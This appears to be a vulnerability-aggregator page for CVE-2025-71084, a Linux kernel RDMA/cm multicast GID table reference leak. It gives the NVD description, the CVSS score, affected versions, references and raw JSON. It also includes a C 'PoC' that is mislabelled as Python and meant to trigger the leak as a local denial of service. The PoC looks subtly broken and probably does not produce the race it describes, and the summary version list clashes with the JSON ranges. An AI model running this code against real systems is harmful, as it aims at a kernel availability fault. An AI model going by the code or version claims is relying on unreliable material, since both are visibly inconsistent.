CVE-2025-71084

Description

In the Linux kernel, the following vulnerability has been resolved: RDMA/cm: Fix leaking the multicast GID table reference If the CM ID is destroyed while the CM event for multicast creating is still queued the cancel_work_sync() will prevent the work from running which also prevents destroying the ah_attr. This leaks a refcount and triggers a WARN: GID entry ref leak for dev syz1 index 2 ref=573 WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline] WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886 Destroy the ah_attr after canceling the work, it is safe to call this twice.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.15 (stable branch commits: 3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5)

Linux Kernel < 5.10 (stable branch commit: 57f3cb6c84159d12ba343574df2115fb18dd83ca)

Linux Kernel < 5.4 (stable branch commit: 5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3)

Linux Kernel < 4.19 (stable branch commit: ab668a58c4a2ccb6d54add7a76f2f955d15d0196)

Linux Kernel < 4.14 (stable branch commit: abf38398724ecc888f62c678d288da40d11878af)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <rdma/rdma_cma.h>
#include <rdma/ib_verbs.h>
#include <pthread.h>
#include <unistd.h>

/* PoC for CVE-2025-71084: RDMA/cm multicast GID table reference leak
 * This demonstrates triggering the condition where CM ID is destroyed
 * while multicast creation event is still queued.
 */

volatile int destroy_now = 0;

void* work_thread(void* arg) {
    struct rdma_cm_id *id = (struct rdma_cm_id*)arg;
    
    /* Simulate multicast join operation that queues work */
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(12345);
    addr.sin_addr.s_addr = inet_addr("224.0.0.1");
    
    /* This queues work for multicast GID registration */
    rdma_join_multicast(id, (struct sockaddr*)&addr, NULL);
    
    /* Signal that work is queued */
    while (!destroy_now) {
        usleep(1000);
    }
    
    return NULL;
}

int main() {
    struct rdma_event_channel *ec = NULL;
    struct rdma_cm_id *id = NULL;
    pthread_t tid;
    
    /* Initialize RDMA resources */
    ec = rdma_create_event_channel();
    if (!ec) {
        fprintf(stderr, "Failed to create event channel\n");
        return 1;
    }
    
    if (rdma_create_id(ec, &id, NULL, RDMA_PS_TCP)) {
        fprintf(stderr, "Failed to create CM ID\n");
        return 1;
    }
    
    /* Start thread that queues multicast work */
    pthread_create(&tid, NULL, work_thread, id);
    
    /* Give time for work to be queued */
    usleep(50000);
    
    /* Destroy CM ID while multicast work is queued
     * This triggers cancel_work_sync() preventing ah_attr cleanup
     * and causes reference leak */
    destroy_now = 1;
    pthread_join(tid, NULL);
    
    rdma_destroy_id(id);
    rdma_destroy_event_channel(ec);
    
    printf("Check dmesg for: GID entry ref leak warning\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71084
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71084
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71084/
[4] VulDB https://vuldb.com/cve/CVE-2025-71084
[5] https://git.kernel.org/stable/c/3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5
[6] https://git.kernel.org/stable/c/57f3cb6c84159d12ba343574df2115fb18dd83ca
[7] https://git.kernel.org/stable/c/5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3
[8] https://git.kernel.org/stable/c/ab668a58c4a2ccb6d54add7a76f2f955d15d0196
[9] https://git.kernel.org/stable/c/abf38398724ecc888f62c678d288da40d11878af
[10] https://git.kernel.org/stable/c/c0acdee513239e1d6e1b490f56be0e6837dfd162
[11] https://git.kernel.org/stable/c/d5ce588a9552878859a4d44b70b724216c188a5f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71084", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:08.007", "lastModified": "2026-03-25T19:33:26.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nRDMA/cm: Soluciona la fuga de la referencia de la tabla GID de multidifusión\n\nSi el ID de CM es destruido mientras el evento de CM para la creación de multidifusión aún está en cola, la función cancel_work_sync() evitará que el trabajo se ejecute, lo que también impide destruir el ah_attr. Esto provoca una fuga de refcount y activa una ADVERTENCIA:\n\n Fuga de referencia de entrada GID para dev syz1 índice 2 ref=573\n ADVERTENCIA: CPU: 1 PID: 655 en drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n ADVERTENCIA: CPU: 1 PID: 655 en drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestruir el ah_attr después de cancelar el trabajo; es seguro llamar a esto dos veces."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.20", "versionEndExcluding": "5.10.248", "matchCriteriaId": "E02EDAC5-9D90-49EA-AFE8-04DB188472C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11.3", "versionEndExcluding": "5.12", "matchCriteriaId": "1F7C7012-9E04-4106-8340-6697917F40CF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.12.1", "versionEndExcluding": "5.15.198", "matchCriteriaId": "3BA018E1-5321-421F-A291-0912B82BB7E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.160", "matchCriteriaId": "C10CC03E-16A9-428A-B449-40D3763E15F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.12:-:*:*:*:*:*:*", "matchCriteriaId": "75EB504D-4A83-4C67-9C8D-FD9C6C8EB4CD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kern ... (truncated)